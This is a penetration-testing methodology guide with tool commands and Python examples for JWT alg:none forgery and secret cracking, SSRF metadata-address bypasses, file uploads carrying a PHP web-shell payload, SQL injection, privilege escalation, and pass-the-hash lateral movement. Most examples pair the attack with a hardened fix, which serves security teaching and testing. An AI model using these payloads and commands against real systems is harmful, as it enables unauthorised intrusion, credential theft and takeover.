Analysis & Exploitation¶
You've mapped the target's attack surface — now find the weaknesses
This is where scanners earn their keep and where humans earn their pay
Automated Scanning¶
Cover ground fast, then double-check everything
Web Application Scanners¶
# Nikto — quick web server scan
nikto -h https://target.com -o nikto_report.html
# ZAP — full-featured, great for CI/CD pipelines
zap-full-scan.py -t https://target.com -r zap_report.html
# Nuclei — template-based vuln detection
nuclei -u https://target.com -t nuclei-templates/ -o nuclei_results.txt
Network Vulnerability Scanners¶
# Nessus (requires commercial license). nessuscli only manages the daemon (users, plugin feed);
# scans are created and launched from the web UI or the REST API, not from nessuscli
nessuscli update          # pull the current plugin feed before scanning
# OpenVAS — open source alternative. Scans are GMP tasks, created in the GSA web UI
# or sent as GMP XML with gvm-cli (gvm-tools)
gvm-cli socket --xml "<get_version/>"    # confirm the GMP socket answers
gvm-cli socket --xml "<get_tasks/>"      # list the configured scan tasks
Automated scanning philosophy:
- Start broad, then drill deep
- Every automated finding gets manual verification
- False positives are your enemy: verify, verify, verify
Manual Assessment¶
Automated tools miss business logic flaws, race conditions, and creative exploitation paths
This is where you earn the big bucks
Business Logic Testing¶
# Price manipulation in e-commerce
# Try negative numbers, decimals, oversized quantities, or intercepting cart updates
# Example: change the price parameter in the POST request (a server that honours it has the bug)
POST /api/cart/update
{"item_id": "123", "quantity": 1, "price": 0.01}
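The server side of that request, as an added example (not code from the original page): a handler that trusts the client's `price` and `quantity` next to one that prices from its own catalog and bounds the quantity, run against the probes a tester would send. The catalog, item IDs and limits are constructed for the example.

```python
from decimal import Decimal
from typing import Dict

# Constructed catalog: the server-side source of truth for prices
CATALOG: Dict[str, Decimal] = {"123": Decimal("49.99"), "456": Decimal("5.00")}
MAX_QTY = 100   # assumed business limit per line item


class CartError(ValueError):
    pass


def vulnerable_cart_total(request: dict) -> Decimal:
    """Trusts every field the client sent, including the price and the sign of the quantity."""
    return Decimal(str(request["price"])) * Decimal(str(request["quantity"]))


def hardened_cart_total(request: dict) -> Decimal:
    """Price comes from the catalog; quantity must be a positive integer within bounds."""
    item_id = str(request.get("item_id", ""))
    if item_id not in CATALOG:
        raise CartError("unknown item")
    qty = request.get("quantity")
    if isinstance(qty, bool) or not isinstance(qty, int):
        raise CartError("quantity must be an integer")
    if not 1 <= qty <= MAX_QTY:
        raise CartError("quantity out of range")
    # A client-supplied price is ignored; a mismatch is worth logging as a tamper signal
    return CATALOG[item_id] * qty


# Constructed probes a tester would send to /api/cart/update
PROBES = [
    {"item_id": "123", "quantity": 1, "price": 0.01},       # price override
    {"item_id": "123", "quantity": -1, "price": 49.99},     # negative quantity: a credit
    {"item_id": "123", "quantity": 1.5, "price": 49.99},    # fractional quantity
    {"item_id": "123", "quantity": 10**9, "price": 49.99},  # absurd quantity
]


def run_probes(handler) -> Dict[int, str]:
    """Send every probe through a handler and record the total or the rejection reason."""
    results = {}
    for i, probe in enumerate(PROBES):
        try:
            results[i] = str(handler(probe))
        except CartError as err:
            results[i] = f"rejected: {err}"
    return results


if __name__ == "__main__":
    print("vulnerable:", run_probes(vulnerable_cart_total))
    print("hardened:  ", run_probes(hardened_cart_total))
```

The vulnerable handler returns 0.01 for the first probe and a negative total for the second; the hardened one charges the catalog price and rejects the rest. The test to run on a live target is the same: compare the total the server computes with the one it should have computed.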
API Security Testing¶
# Endpoint discovery from JS files
grep -rhoE '/(api|v[0-9]+)/[A-Za-z0-9_./-]+' /path/to/js/files/ | sort -u
# GraphQL introspection query
curl -X POST https://target.com/graphql -H "Content-Type: application/json" \
-d '{"query": "{__schema{types{name fields{name}}}}"}'
# Parameter fuzzing
ffuf -u https://api.target.com/v1/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/objects.txt
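The same discovery work in code, as an added example that is not part of the original page: a regex pass over a bundled script for route and host literals (what the grep above approximates), and a flattener for the introspection response so the type/field list becomes a target list for fuzzing. The script excerpt and the introspection response are constructed; no real target is involved.

```python
import json
import re
from typing import Dict, List

# Constructed front-end bundle excerpt (hypothetical hosts, not any real target)
JS_SAMPLE = r"""
const BASE = "https://api.target.com/v2";
fetch("/api/v1/users/" + id).then(r => r.json());
axios.post('/api/v1/cart/update', {item_id, quantity});
const EXPORT = `/internal/admin/export`;
const GQL = "https://target.com/graphql";
"""

# Constructed response to the introspection query shown above
INTROSPECTION_SAMPLE = json.dumps({"data": {"__schema": {"types": [
    {"name": "Query", "fields": [{"name": "user"}, {"name": "orders"}]},
    {"name": "Mutation", "fields": [{"name": "resetPassword"}, {"name": "updateCart"}, {"name": "deleteUser"}]},
    {"name": "__Type", "fields": [{"name": "name"}]},
    {"name": "String", "fields": None},
]}}})

PATH_RE = re.compile(r"""["'`](/(?:api|internal|v\d+)[A-Za-z0-9_./{}:-]*)["'`]""")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def extract_paths(js: str) -> List[str]:
    """Quoted path literals that look like API routes, deduplicated."""
    return sorted(set(PATH_RE.findall(js)))


def extract_hosts(js: str) -> List[str]:
    """Hostnames from absolute URLs in the bundle: extra scope to confirm before testing."""
    return sorted({h.lower() for h in HOST_RE.findall(js)})


def schema_fields(introspection_json: str) -> Dict[str, List[str]]:
    """Flatten an introspection response into {type: [field, ...]}, skipping built-ins and scalars."""
    types = json.loads(introspection_json)["data"]["__schema"]["types"]
    return {t["name"]: sorted(f["name"] for f in t["fields"])
            for t in types if not t["name"].startswith("__") and t.get("fields")}


def interesting_fields(schema: Dict[str, List[str]],
                       keywords=("admin", "reset", "delete", "export", "debug")) -> List[str]:
    """Fields to look at first: names that hint at privilege or destructive effect."""
    return sorted(f"{t}.{f}" for t, fields in schema.items()
                  for f in fields if any(k in f.lower() for k in keywords))


if __name__ == "__main__":
    print(extract_paths(JS_SAMPLE))
    print(extract_hosts(JS_SAMPLE))
    print(interesting_fields(schema_fields(INTROSPECTION_SAMPLE)))
```

Feed the path list to ffuf as a wordlist and the flattened schema to a GraphQL fuzzer; fields whose names imply privilege get tried first, unauthenticated and as a low-privilege user.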
JWT Attacks¶
# Decode JWT without verification
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
# Try common secrets
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -C -d /usr/share/wordlists/rockyou.txt
# Change algorithm to "none"
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -X a
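What those three jwt_tool runs do under the hood, as an added example written for this page (not jwt_tool's code): unverified decode, an alg:none forgery, an offline dictionary attack on the HS256 secret, and the verifier bug that makes the forgery work next to the pinned-algorithm verifier that rejects it. Only the standard library is used; the secret and claims are constructed.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional, Tuple

ALLOWED_ALGS = {"HS256"}   # the hardened verifier pins to this, whatever the header says


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Header and payload with no signature check (what `jwt_tool <token>` prints)."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def hs256(signing_input: str, secret: bytes) -> str:
    return b64url_encode(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())


def make_token(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    header = {"alg": alg, "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode()) for part in (header, payload)
    )
    if alg == "none":
        return signing_input + "."            # alg:none tokens carry an empty signature
    return signing_input + "." + hs256(signing_input, secret)


def forge_alg_none(token: str, new_claims: dict) -> str:
    """What `jwt_tool -X a` does: edit the claims, set alg to none, drop the signature."""
    _header, payload = decode_unverified(token)
    payload.update(new_claims)
    return make_token(payload, b"", alg="none")


def naive_verify(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable: honours the alg field of an attacker-controlled header."""
    header, payload = decode_unverified(token)
    signing_input, signature = token.rsplit(".", 1)
    if header.get("alg") == "none":
        return payload                        # unsigned token accepted
    if header.get("alg") == "HS256" and hmac.compare_digest(signature, hs256(signing_input, secret)):
        return payload
    return None


def strict_verify(token: str, secret: bytes) -> Optional[dict]:
    """Hardened: the server decides the algorithm and always checks the MAC."""
    header, payload = decode_unverified(token)
    if header.get("alg") not in ALLOWED_ALGS:
        return None
    signing_input, signature = token.rsplit(".", 1)
    if not hmac.compare_digest(signature, hs256(signing_input, secret)):
        return None
    return payload


def crack_hs256(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on the HS256 secret (what `jwt_tool -C -d wordlist` does)."""
    signing_input, signature = token.rsplit(".", 1)
    for candidate in candidates:
        if hmac.compare_digest(signature, hs256(signing_input, candidate)):
            return candidate
    return None


if __name__ == "__main__":
    secret = b"secret123"                     # constructed: a weak secret a wordlist would contain
    token = make_token({"sub": "alice", "role": "user"}, secret)
    forged = forge_alg_none(token, {"role": "admin"})
    print("naive accepts forged :", naive_verify(forged, secret))
    print("strict accepts forged:", strict_verify(forged, secret))
    print("cracked secret       :", crack_hs256(token, [b"password", b"secret123"]))
```

Cracking is an offline attack, so it costs the target nothing and is safe to run on any captured token; the alg:none and tampered tokens must be replayed against the application to prove the verifier is the naive one.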
SSRF Testing¶
# Blind SSRF check with Burp Collaborator or interactsh: a DNS or HTTP hit on the callback proves the fetch happened
curl -X POST https://target.com/fetch -H "Content-Type: application/json" \
-d '{"url": "http://YOUR-BURP-COLLABORATOR"}'
# Cloud metadata endpoints to try. GCP and Azure require a request header, so the SSRF must let you set
# one; AWS only requires a header (and a prior PUT for a token) when IMDSv2 is enforced
# http://169.254.169.254/latest/meta-data/ (AWS; IMDSv2: X-aws-ec2-metadata-token from PUT /latest/api/token)
# http://metadata.google.internal/computeMetadata/v1/ (GCP; header Metadata-Flavor: Google)
# http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure; header Metadata: true)
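Most SSRF "fixes" are a denylist on the URL string, so the list of metadata addresses above is worth sending in every encoding. The added example below (written for this page, not from the original) generates those variants, shows a substring denylist letting them through, and shows the resolve-then-check validator that blocks them. DNS is replaced by a constructed table so it runs offline; `system_resolver` is what a deployment would pass instead.

```python
import ipaddress
import re
import socket
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

# Constructed DNS view so the example runs offline (hypothetical names and addresses)
FAKE_DNS = {
    "target.com": ["93.184.216.34"],                  # assumed public address
    "imds.attacker.example": ["169.254.169.254"],     # attacker-controlled name pointing at IMDS
    "metadata.google.internal": ["169.254.169.254"],
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


def system_resolver(host: str) -> List[str]:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def naive_allowed(url: str) -> bool:
    """Vulnerable: substring denylist on the raw URL. Re-encoded IPs and DNS walk straight past it."""
    blocked = ("169.254.169.254", "metadata", "localhost", "127.0.0.1")
    return not any(word in url.lower() for word in blocked)


def literal_ip(host: str):
    """Normalise a numeric host (dotted quad, IPv6, 32-bit decimal, 0x hex) to an ip_address, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    if re.fullmatch(r"0x[0-9a-f]+|[1-9][0-9]*", host, re.IGNORECASE):
        try:
            return ipaddress.ip_address(int(host, 0))
        except ValueError:
            return None
    return None


def strict_allowed(url: str, resolver: Callable[[str], Iterable[str]] = system_resolver) -> bool:
    """Hardened: http(s) only, resolve the host, reject anything that is not a global unicast address.
    Re-run on every redirect hop: a public host can 302 to 169.254.169.254."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addr = literal_ip(parts.hostname)
    candidates = [addr] if addr else [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
    if not candidates:
        return False                                   # unresolvable: fail closed
    for a in candidates:
        if isinstance(a, ipaddress.IPv6Address) and a.ipv4_mapped:
            a = a.ipv4_mapped                          # [::ffff:169.254.169.254] is still IMDS
        if not a.is_global or a.is_link_local:
            return False
    return True


# Encodings of the AWS/Azure metadata address to try when a denylist is suspected
IMDS_VARIANTS = [
    "http://169.254.169.254/latest/meta-data/",
    "http://2852039166/latest/meta-data/",               # 32-bit decimal
    "http://0xA9FEA9FE/latest/meta-data/",               # hex
    "http://[::ffff:169.254.169.254]/latest/meta-data/", # IPv4-mapped IPv6
    "http://imds.attacker.example/latest/meta-data/",    # DNS pointing into the link-local range
]

if __name__ == "__main__":
    for url in IMDS_VARIANTS:
        print(f"{url:55} naive={naive_allowed(url)!s:5} strict={strict_allowed(url, fake_resolver)}")
```

On an engagement the variants that the naive check lets through are the ones to send; when reporting, the resolver-based check plus redirect re-validation (and IMDSv2 on the instance) is the fix to recommend.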
Threat Modeling¶
Proactive hunting — find the weakness before it finds you
- Draw data flow diagrams to understand trust boundaries
- Build attack trees for complex scenarios
- Prioritize findings by business impact, not CVSS score
flowchart TD
A[Identify Assets] --> B[Map Data Flows]
B --> C[Find Trust Boundaries]
C --> D[Enumerate Threats]
D --> E[Assess Risk]
E --> F[Prioritize]
F --> G[Exploit/Report]
Exploitation¶
Safe, controlled exploitation to demonstrate real impact
# SQL injection with sqlmap
# --risk=3 adds OR-based payloads that can modify or delete rows and --level=5 tests every header and
# cookie; start at the defaults (risk 1, level 1) and raise them deliberately, in scope and with backups agreed
sqlmap -u "https://target.com/search?q=test" \
--batch --risk=3 --level=5 --dbs
# XSS detection with XSStrike
python3 xsstrike.py -u "https://target.com/search" --params --crawl
# File upload bypass — try all the tricks
# 1. Change extension (.php -> .php5, .phtml)
# 2. Modify Content-Type header
# 3. Add magic bytes to bypass signature detection
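The three tricks above as an added example (not code from the original page): constructed uploads carrying a hypothetical PHP payload, a typical extension-denylist-plus-sniff check that they get past, and the allowlist-and-consistency check that stops them.

```python
import re
from typing import List, Tuple

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes of the image types accepted, mapped to a canonical type name
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
CANONICAL = {"jpeg": "jpg"}


def sniff(data: bytes):
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def naive_accept(filename: str, content_type: str, data: bytes) -> bool:
    """Vulnerable: extension denylist, trusts Content-Type, magic-byte check that only looks at the prefix."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext in {"php", "jsp", "asp", "aspx"}:
        return False
    if not content_type.startswith("image/"):
        return False
    return sniff(data) is not None


def strict_accept(filename: str, content_type: str, data: bytes) -> bool:
    """Hardened: one allowlisted extension, sniffed type must match it, no script markers in the body.
    A real deployment also re-encodes the image and stores it under a random name outside the web root."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:      # rejects shell.php.jpg, .phtml, .php5
        return False
    kind = sniff(data)
    if kind is None or kind != CANONICAL.get(parts[1], parts[1]):
        return False
    if re.search(rb"<\?php|<\?=|<%|<script", data, re.IGNORECASE):
        return False
    return True


# Constructed uploads of a hypothetical payload, one per trick in the list above
PAYLOAD = b"<?php system($_GET['c']); ?>"
TRICKS: List[Tuple[str, str, bytes]] = [
    ("shell.php5", "image/png", b"GIF89a" + PAYLOAD),       # 1. alternate extension
    ("shell.php", "image/jpeg", PAYLOAD),                   # 2. spoofed Content-Type alone
    ("shell.php.jpg", "image/jpeg", b"GIF89a" + PAYLOAD),   # 3. magic bytes + double extension
    ("shell.phtml", "image/gif", b"GIF89a" + PAYLOAD),      # 1 and 3 combined
]


def survivors(checker) -> List[str]:
    """Filenames the given checker would have written to disk."""
    return [name for name, ctype, data in TRICKS if checker(name, ctype, data)]


if __name__ == "__main__":
    print("naive lets through :", survivors(naive_accept))
    print("strict lets through:", survivors(strict_accept))
```

Getting a file stored is only half the finding: the impact claim needs the upload directory to be served with the interpreter enabled, so fetch the stored file and show the payload executes (or that it is served as inert bytes).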
Privilege Escalation¶
Linux¶
# Check SUID binaries (regular files only; errors from unreadable directories suppressed)
find / -perm -4000 -type f 2>/dev/null
# Check sudo permissions: look for NOPASSWD entries and for env_keep+=LD_PRELOAD in the Defaults
sudo -l
# Look for writable scripts in cron directories (also /etc/crontab and /var/spool/cron)
ls -la /etc/cron*
find /etc/cron* /etc/crontab -writable 2>/dev/null
# Environment variable abuse
# If sudo -l shows env_keep+=LD_PRELOAD, a shared object you control is loaded into the sudo'd command as root
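The same Linux checks as code, as an added example that is not from the original page: a SUID walk equivalent to the find command, a writable-cron-script check, and a parser for `sudo -l` output that flags NOPASSWD entries and a kept LD_PRELOAD. The filesystem tree and the `sudo -l` transcript are constructed (the tree is built in a temporary directory so the block runs anywhere).

```python
import os
import re
import stat
import tempfile
from typing import Dict, List


def find_suid(root: str) -> List[str]:
    """Equivalent of `find ROOT -perm -4000 -type f`: lstat so symlinks are not followed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                      # unreadable entries, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def writable_cron_scripts(cron_dirs: List[str]) -> List[str]:
    """Regular files under cron directories that the current user can write to."""
    hits = []
    for cron_dir in cron_dirs:
        for dirpath, _dirs, files in os.walk(cron_dir):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.isfile(path) and os.access(path, os.W_OK):
                    hits.append(path)
    return sorted(hits)


def parse_sudo_l(text: str) -> Dict[str, object]:
    """Pull the escalation-relevant bits out of `sudo -l` output."""
    commands = re.findall(r"^\s*\((.+?)\)\s*(?:NOPASSWD:\s*)?(.+?)\s*$", text, re.MULTILINE)
    env_keep = [e.strip() for e in re.findall(r"env_keep\+?=([^,\n]+)", text)]
    return {
        "commands": commands,                                   # (runas, command) pairs
        "nopasswd": re.findall(r"NOPASSWD:\s*(.+?)\s*$", text, re.MULTILINE),
        "env_keep": env_keep,
        "ld_preload": any("LD_PRELOAD" in e for e in env_keep),  # kept LD_PRELOAD: a .so runs as root
        "setenv": bool(re.search(r"\bSETENV\b", text)),
    }


# Constructed `sudo -l` output for a hypothetical www-data user on a host named web01
SUDO_L_SAMPLE = """\
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/sbin/service apache2 restart
    (ALL) /usr/bin/find
"""


def build_demo_tree() -> str:
    """Constructed tree in a temp dir: one SUID file, one normal file, one writable cron script."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    os.makedirs(os.path.join(root, "usr/bin"))
    os.makedirs(os.path.join(root, "etc/cron.d"))
    for rel, mode in (("usr/bin/suidme", 0o4755), ("usr/bin/normal", 0o755), ("etc/cron.d/backup.sh", 0o775)):
        path = os.path.join(root, rel)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    print("SUID:", find_suid(root))
    print("writable cron:", writable_cron_scripts([os.path.join(root, "etc/cron.d")]))
    print("sudo -l:", parse_sudo_l(SUDO_L_SAMPLE))
```

Point `find_suid` at `/` and `writable_cron_scripts` at the real cron directories on the box; the parser is for pasting in whatever `sudo -l` printed. A kept LD_PRELOAD with any sudo-able command, or a writable script that root's cron runs, is a direct path to root and belongs in the report with the exact line that proves it.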
Windows (PowerShell)¶
# List running services (Get-Service shows state, not ACLs)
Get-Service | Where-Object {$_.Status -eq "Running"}
# Check a service's DACL: DC (change config) granted to WD (Everyone) or AU (Authenticated Users) is exploitable
sc.exe sdshow ServiceName
# Check AlwaysInstallElevated (must be 1 in BOTH hives to be exploitable)
Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -ErrorAction SilentlyContinue
Get-ItemProperty "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -ErrorAction SilentlyContinue
# Check unquoted service paths (a space in the path, no leading quote, outside C:\Windows)
Get-CimInstance Win32_Service | Where-Object { $_.PathName -match ' ' -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^C:\\Windows' } | Select-Object Name, PathName
Lateral Movement¶
# Pass-the-hash with Impacket (the LM half can be left empty: -hashes :NTHASH)
impacket-psexec DOMAIN/user@target -hashes LMHASH:NTHASH
# SSH key reuse: non-interactive, so a key the target does not accept fails instead of prompting
for key in ~/.ssh/id_*; do
    [[ $key == *.pub ]] && continue
    ssh -o BatchMode=yes -o ConnectTimeout=5 -i "$key" user@target true && echo "accepted: $key"
done
# Sysinternals PsExec for Windows lateral movement
psexec \\target -u DOMAIN\user -p password cmd
Every finding you exploit gets documented: you're proving impact, not having fun
Save the fun for the lab